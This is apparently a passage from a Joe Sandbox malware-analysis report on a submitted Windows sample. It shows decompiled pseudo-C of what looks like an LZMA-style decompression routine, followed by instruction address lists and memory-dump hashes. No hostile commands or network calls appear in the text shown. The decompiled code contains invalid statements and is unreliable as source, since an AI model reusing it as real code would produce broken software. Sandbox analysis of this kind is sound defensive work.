                                  											__eflags = __eax -  *(__ebp - 0x74);
                                  											if(__eax >=  *(__ebp - 0x74)) {
                                  												__eax = __eax +  *(__ebp - 0x74);
                                  												__eflags = __eax;
                                  											}
                                  											__edx =  *(__ebp - 8);
                                  											__cl =  *(__eax + __edx);
                                  											__eax =  *(__ebp - 0x14);
                                  											 *(__ebp - 0x5c) = __cl;
                                  											 *(__eax + __edx) = __cl;
                                  											__eax = __eax + 1;
                                  											__edx = 0;
                                  											_t275 = __eax %  *(__ebp - 0x74);
                                  											__eax = __eax /  *(__ebp - 0x74);
                                  											__edx = _t275;
                                  											__eax =  *(__ebp - 0x68);
                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  											_t284 = __ebp - 0x64;
                                  											 *_t284 =  *(__ebp - 0x64) - 1;
                                  											__eflags =  *_t284;
                                  											 *( *(__ebp - 0x68)) = __cl;
                                  											L80:
                                  											 *(__ebp - 0x14) = __edx;
                                  											goto L81;
                                  										case 0x1c:
                                  											while(1) {
                                  												L124:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													break;
                                  												}
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__edx =  *(__ebp - 8);
                                  												__cl =  *(__eax + __edx);
                                  												__eax =  *(__ebp - 0x14);
                                  												 *(__ebp - 0x5c) = __cl;
                                  												 *(__eax + __edx) = __cl;
                                  												__eax = __eax + 1;
                                  												__edx = 0;
                                  												_t415 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t415;
                                  												__eax =  *(__ebp - 0x68);
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  												__eflags =  *(__ebp - 0x30);
                                  												 *( *(__ebp - 0x68)) = __cl;
                                  												 *(__ebp - 0x14) = _t415;
                                  												if( *(__ebp - 0x30) > 0) {
                                  													continue;
                                  												} else {
                                  													L81:
                                  													 *(__ebp - 0x88) = 2;
                                  													goto L1;
                                  												}
                                  											}
                                  											 *(__ebp - 0x88) = 0x1c;
                                  											L170:
                                  											_push(0x22);
                                  											_pop(_t567);
                                  											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                  											_t535 = 0;
                                  											L172:
                                  											return _t535;
                                  									}
                                  								}
                                  								L171:
                                  								_t535 = _t534 | 0xffffffff;
                                  								goto L172;
                                  							}
                                  						}
                                  						__eax =  *(__ebp - 0x50);
                                  						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  						__eax =  *(__ebp - 0x58);
                                  						__esi = __edx + __eax;
                                  						 *(__ebp - 0x54) = __esi;
                                  						__ax =  *__esi;
                                  						__edi = __ax & 0x0000ffff;
                                  						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  						if( *(__ebp - 0xc) >= __ecx) {
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  							__cx = __ax;
                                  							__cx = __ax >> 5;
                                  							__eax = __eax - __ecx;
                                  							__edx = __edx + 1;
                                  							 *__esi = __ax;
                                  							 *(__ebp - 0x50) = __edx;
                                  						} else {
                                  							 *(__ebp - 0x10) = __ecx;
                                  							0x800 = 0x800 - __edi;
                                  							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  							 *__esi = __cx;
                                  						}
                                  						if( *(__ebp - 0x10) >= 0x1000000) {
                                  							goto L148;
                                  						} else {
                                  							goto L146;
                                  						}
                                  					}
                                  					goto L1;
                                  				}
                                  			}








                                  0x00000000
                                  0x00406c67
                                  0x00000000
                                  0x00406e9d
                                  0x00406ea1
                                  0x00406ebf
                                  0x00406ec2
                                  0x00406ec9
                                  0x00406ecc
                                  0x00406ecf
                                  0x00406ed2
                                  0x00406ed5
                                  0x00406ed8
                                  0x00406eda
                                  0x00406ee1
                                  0x00406ee2
                                  0x00406ee4
                                  0x00406ee7
                                  0x00406eea
                                  0x00406eed
                                  0x00406eed
                                  0x00406ef2
                                  0x00000000
                                  0x00406ef2
                                  0x00406ea3
                                  0x00406ea6
                                  0x00406ea9
                                  0x00406eb3
                                  0x00000000
                                  0x00000000
                                  0x00406f07
                                  0x00406f0b
                                  0x00406f2e
                                  0x00406f31
                                  0x00406f34
                                  0x00406f3e
                                  0x00406f0d
                                  0x00406f0d
                                  0x00406f10
                                  0x00406f13
                                  0x00406f16
                                  0x00406f23
                                  0x00406f26
                                  0x00406f26
                                  0x00000000
                                  0x00000000
                                  0x00406f4a
                                  0x00406f4e
                                  0x00000000
                                  0x00000000
                                  0x00406f54
                                  0x00406f58
                                  0x00000000
                                  0x00000000
                                  0x00406f5e
                                  0x00406f60
                                  0x00406f64
                                  0x00406f64
                                  0x00406f67
                                  0x00406f6b
                                  0x00000000
                                  0x00000000
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fc6
                                  0x00406fc9
                                  0x00406fcc
                                  0x00406fd6
                                  0x00000000
                                  0x00406fd6
                                  0x00406fc1
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00406ffc
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00407005
                                  0x00407005
                                  0x00407008
                                  0x0040700f
                                  0x00407014
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00000000
                                  0x00407321
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00000000
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00406fac

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                  • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                                  • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                  • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00406F4A() {
                                  				unsigned short _t532;
                                  				signed int _t533;
                                  				void _t534;
                                  				void* _t535;
                                  				signed int _t536;
                                  				signed int _t565;
                                  				signed int _t568;
                                  				signed int _t589;
                                  				signed int* _t606;
                                  				void* _t613;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t613 - 0x40) != 0) {
                                  						L89:
                                  						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                  						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                  						L69:
                                  						_t606 =  *(_t613 - 0x58);
                                  						 *(_t613 - 0x84) = 0x12;
                                  						L132:
                                  						 *(_t613 - 0x54) = _t606;
                                  						L133:
                                  						_t532 =  *_t606;
                                  						_t589 = _t532 & 0x0000ffff;
                                  						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                  						if( *(_t613 - 0xc) >= _t565) {
                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                  							 *(_t613 - 0x40) = 1;
                                  							_t533 = _t532 - (_t532 >> 5);
                                  							 *_t606 = _t533;
                                  						} else {
                                  							 *(_t613 - 0x10) = _t565;
                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                  						}
                                  						if( *(_t613 - 0x10) >= 0x1000000) {
                                  							L139:
                                  							_t534 =  *(_t613 - 0x84);
                                  							L140:
                                  							 *(_t613 - 0x88) = _t534;
                                  							goto L1;
                                  						} else {
                                  							L137:
                                  							if( *(_t613 - 0x6c) == 0) {
                                  								 *(_t613 - 0x88) = 5;
                                  								goto L170;
                                  							}
                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  							goto L139;
                                  						}
                                  					} else {
                                  						if( *(__ebp - 0x60) == 0) {
                                  							L171:
                                  							_t536 = _t535 | 0xffffffff;
                                  							L172:
                                  							return _t536;
                                  						}
                                  						__eax = 0;
                                  						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                  						0 | _t258 = _t258 + _t258 + 9;
                                  						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                  						L75:
                                  						if( *(__ebp - 0x64) == 0) {
                                  							 *(__ebp - 0x88) = 0x1b;
                                  							L170:
                                  							_t568 = 0x22;
                                  							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                  							_t536 = 0;
                                  							goto L172;
                                  						}
                                  						__eax =  *(__ebp - 0x14);
                                  						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  						if(__eax >=  *(__ebp - 0x74)) {
                                  							__eax = __eax +  *(__ebp - 0x74);
                                  						}
                                  						__edx =  *(__ebp - 8);
                                  						__cl =  *(__eax + __edx);
                                  						__eax =  *(__ebp - 0x14);
                                  						 *(__ebp - 0x5c) = __cl;
                                  						 *(__eax + __edx) = __cl;
                                  						__eax = __eax + 1;
                                  						__edx = 0;
                                  						_t274 = __eax %  *(__ebp - 0x74);
                                  						__eax = __eax /  *(__ebp - 0x74);
                                  						__edx = _t274;
                                  						__eax =  *(__ebp - 0x68);
                                  						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  						_t283 = __ebp - 0x64;
                                  						 *_t283 =  *(__ebp - 0x64) - 1;
                                  						 *( *(__ebp - 0x68)) = __cl;
                                  						L79:
                                  						 *(__ebp - 0x14) = __edx;
                                  						L80:
                                  						 *(__ebp - 0x88) = 2;
                                  					}
                                  					L1:
                                  					_t535 =  *(_t613 - 0x88);
                                  					if(_t535 > 0x1c) {
                                  						goto L171;
                                  					}
                                  					switch( *((intOrPtr*)(_t535 * 4 +  &M004074A1))) {
                                  						case 0:
                                  							if( *(_t613 - 0x6c) == 0) {
                                  								goto L170;
                                  							}
                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  							_t535 =  *( *(_t613 - 0x70));
                                  							if(_t535 > 0xe1) {
                                  								goto L171;
                                  							}
                                  							_t539 = _t535 & 0x000000ff;
                                  							_push(0x2d);
                                  							asm("cdq");
                                  							_pop(_t570);
                                  							_push(9);
                                  							_pop(_t571);
                                  							_t609 = _t539 / _t570;
                                  							_t541 = _t539 % _t570 & 0x000000ff;
                                  							asm("cdq");
                                  							_t604 = _t541 % _t571 & 0x000000ff;
                                  							 *(_t613 - 0x3c) = _t604;
                                  							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                  							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                  							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                  							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                  								L10:
                                  								if(_t612 == 0) {
                                  									L12:
                                  									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  									goto L15;
                                  								} else {
                                  									goto L11;
                                  								}
                                  								do {
                                  									L11:
                                  									_t612 = _t612 - 1;
                                  									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                  								} while (_t612 != 0);
                                  								goto L12;
                                  							}
                                  							if( *(_t613 - 4) != 0) {
                                  								GlobalFree( *(_t613 - 4));
                                  							}
                                  							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                  							 *(_t613 - 4) = _t535;
                                  							if(_t535 == 0) {
                                  								goto L171;
                                  							} else {
                                  								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                  								goto L10;
                                  							}
                                  						case 1:
                                  							L13:
                                  							__eflags =  *(_t613 - 0x6c);
                                  							if( *(_t613 - 0x6c) == 0) {
                                  								 *(_t613 - 0x88) = 1;
                                  								goto L170;
                                  							}
                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                  							_t45 = _t613 - 0x48;
                                  							 *_t45 =  *(_t613 - 0x48) + 1;
                                  							__eflags =  *_t45;
                                  							L15:
                                  							if( *(_t613 - 0x48) < 4) {
                                  								goto L13;
                                  							}
                                  							_t547 =  *(_t613 - 0x40);
                                  							if(_t547 ==  *(_t613 - 0x74)) {
                                  								L20:
                                  								 *(_t613 - 0x48) = 5;
                                  								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                  								goto L23;
                                  							}
                                  							 *(_t613 - 0x74) = _t547;
                                  							if( *(_t613 - 8) != 0) {
                                  								GlobalFree( *(_t613 - 8)); // executed
                                  							}
                                  							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                  							 *(_t613 - 8) = _t535;
                                  							if(_t535 == 0) {
                                  								goto L171;
                                  							} else {
                                  								goto L20;
                                  							}
                                  						case 2:
                                  							L24:
                                  							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                  							 *(_t613 - 0x84) = 6;
                                  							 *(_t613 - 0x4c) = _t554;
                                  							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                  							goto L132;
                                  						case 3:
                                  							L21:
                                  							__eflags =  *(_t613 - 0x6c);
                                  							if( *(_t613 - 0x6c) == 0) {
                                  								 *(_t613 - 0x88) = 3;
                                  								goto L170;
                                  							}
                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  							_t67 = _t613 - 0x70;
                                  							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                  							__eflags =  *_t67;
                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  							L23:
                                  							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                  							if( *(_t613 - 0x48) != 0) {
                                  								goto L21;
                                  							}
                                  							goto L24;
                                  						case 4:
                                  							goto L133;
                                  						case 5:
                                  							goto L137;
                                  						case 6:
                                  							__edx = 0;
                                  							__eflags =  *(__ebp - 0x40);
                                  							if( *(__ebp - 0x40) != 0) {
                                  								__eax =  *(__ebp - 4);
                                  								__ecx =  *(__ebp - 0x38);
                                  								 *(__ebp - 0x34) = 1;
                                  								 *(__ebp - 0x84) = 7;
                                  								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  								goto L132;
                                  							}
                                  							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  							__esi =  *(__ebp - 0x60);
                                  							__cl = 8;
                                  							__cl = 8 -  *(__ebp - 0x3c);
                                  							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  							__ecx =  *(__ebp - 0x3c);
                                  							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  							__ecx =  *(__ebp - 4);
                                  							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  							__eflags =  *(__ebp - 0x38) - 4;
                                  							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  							if( *(__ebp - 0x38) >= 4) {
                                  								__eflags =  *(__ebp - 0x38) - 0xa;
                                  								if( *(__ebp - 0x38) >= 0xa) {
                                  									_t98 = __ebp - 0x38;
                                  									 *_t98 =  *(__ebp - 0x38) - 6;
                                  									__eflags =  *_t98;
                                  								} else {
                                  									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  								}
                                  							} else {
                                  								 *(__ebp - 0x38) = 0;
